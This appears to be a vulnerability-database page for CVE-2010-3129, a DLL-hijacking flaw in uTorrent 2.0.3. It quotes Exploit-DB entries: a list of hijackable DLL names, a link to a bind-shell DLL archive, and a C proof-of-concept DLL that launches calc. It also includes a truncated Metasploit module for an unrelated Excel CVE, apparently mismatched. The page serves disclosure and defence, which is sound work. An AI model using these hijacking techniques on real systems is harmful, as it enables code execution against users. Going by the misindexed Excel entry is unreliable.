CVE-2010-3129
Published 2010-08-26
Priority P348 | critical 9.3 | CVSS 2.0 AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.26% (93.6th percentile)
Untrusted search path vulnerability in uTorrent 2.0.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse plugin_dll.dll, userenv.dll, shfolder.dll, dnsapi.dll, dwmapi.dll, iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, or rpcrtremote.dll that is located in the same folder as a .torrent or .btsearch file.
Affected
25 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| utorrent | utorrent | — | — |
No detection rules found.
Exploit-DB
Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)
exploitdb·2010-09-25
CVE-2009-3129 Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)
---
##
# $Id: ms09_067_excel_featheader.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/ole'
class Metasploit3 'Microsoft Excel Malformed FEATHEADER Record Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of the FEATHEADER record
by Microsoft Excel. Revisions of Office XP and later prior to the release of the
MS09-067 bulletin are vulnerable.
When processing a FEATHEADER (Shared Feature) record, Micros
Exploit-DB
μTorrent (uTorrent) 2.0.3 - DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3129 μTorrent (uTorrent) 2.0.3 - DLL Hijacking
---
###########################################################################
#
# Title: uTorrent <=2.0.3 Dll Hijacking Local Exploits
# By: Dr_IDE
# Tested: Windows 7RC
# Note: These are additional DLL's with unsafe Load Paths
# Reference: http://www.exploit-db.com/exploits/14726/
#
############################################################################
If the payload .DLL file is renamed to any of these files and placed in the
utorrent.exe directory, the payload will be executed with users' credentials.
-userenv.dll
-shfolder.dll
-dnsapi.dll
-dwmapi.dll
-iphlpapi.dll
-dhcpcsvc.dll
-dhcpcsvc6.dll
-rpcrtremote.dll
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz
Exploit-DB
μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking
exploitdb·2010-08-24
CVE-2010-3129 μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking
---
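/*
Exploit Title: uTorrent
*/
#include <windows.h>  /* WinExec */
#include <stdlib.h>   /* exit */
#define DLLIMPORT __declspec (dllexport)
int evil(void);  /* declared before its use in hook_startup() */
/* Function exported from the DLL */
DLLIMPORT void hook_startup() { evil(); }
/* Proof-of-concept payload: starts calc, then exits the process */
int evil(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}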
No writeups or analysis indexed.
http://secunia.com/advisories/41051
http://www.exploit-db.com/exploits/14726
http://www.exploit-db.com/exploits/14748
http://www.vupen.com/english/advisories/2010/2164
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6887